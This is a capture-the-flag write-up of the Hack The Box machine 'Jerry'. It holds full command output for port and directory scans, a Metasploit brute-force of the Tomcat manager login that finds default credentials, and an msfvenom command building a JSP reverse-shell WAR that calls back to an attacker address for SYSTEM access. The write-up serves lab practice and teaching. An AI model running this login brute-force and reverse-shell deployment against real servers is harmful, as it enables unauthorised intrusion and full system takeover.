skip to Main Content

HTB – Jerry

nmap -sVC 10.10.10.95
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 06:57 CEST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 3.55% done; ETC: 06:58 (0:00:54 remaining)
Nmap scan report for 10.10.10.95
Host is up (0.047s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
dirb http://10.10.10.95:8080

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr 18 06:58:59 2021
URL_BASE: http://10.10.10.95:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.95:8080/ ----
+ http://10.10.10.95:8080/docs (CODE:302|SIZE:0)                                                                           
+ http://10.10.10.95:8080/examples (CODE:302|SIZE:0)                                                                       
+ http://10.10.10.95:8080/favicon.ico (CODE:200|SIZE:21630)                                                                
+ http://10.10.10.95:8080/host-manager (CODE:302|SIZE:0)                                                                   
+ http://10.10.10.95:8080/manager (CODE:302|SIZE:0)     
                                                                                                                           
-----------------
END_TIME: Sun Apr 18 07:02:56 2021
DOWNLOADED: 4612 - FOUND: 5

one port 8080 we can found the default tomcat page.. booring..

let’s take a look at /manager and /host-manager we need to login

time for msf -> scanner/http/tomcat_mgr_login

msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                   Required  Description
   ----              ---------------                   --------  -----------
   BLANK_PASSWORDS   false                             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                 yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                             no        Try each user/password couple stored in the current datab
                                                                 ase
   DB_ALL_PASS       false                             no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                             no        Add all users in the current database to the list
   PASSWORD                                            no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/  no        File containing passwords, one per line
                     data/wordlists/tomcat_mgr_defaul
                     t_pass.txt
   Proxies                                             no        A proxy chain of format type:host:port[,type:host:port][.
                                                                 ..]
   RHOSTS            10.10.10.95                       yes       The target host(s), range CIDR identifier, or hosts file
                                                                 with syntax 'file:<path>'
   RPORT             8080                              yes       The target port (TCP)
   SSL               false                             no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                             yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                     yes       URI for Manager login. Default is /manager/html
   THREADS           1                                 yes       The number of concurrent threads (max one per host)
   USERNAME                                            no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/  no        File containing users and passwords separated by space, o
                     data/wordlists/tomcat_mgr_defaul            ne pair per line
                     t_userpass.txt
   USER_AS_PASS      false                             no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/  no        File containing users, one per line
                     data/wordlists/tomcat_mgr_defaul
                     t_users.txt
   VERBOSE           true                              yes       Whether to print output for all attempts
   VHOST                                               no        HTTP server virtual host

msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
[-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

and now we have a user to login from now on it’s an easy game to gain access to the shell.. create a .war payload and upload it!

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=5555 -f war > shell.war

now execute the path /shell or click on shell and that’s the magic πŸ™‚

don’t forget the listener πŸ˜€ and done we are logged in as nt authority\system

Back To Top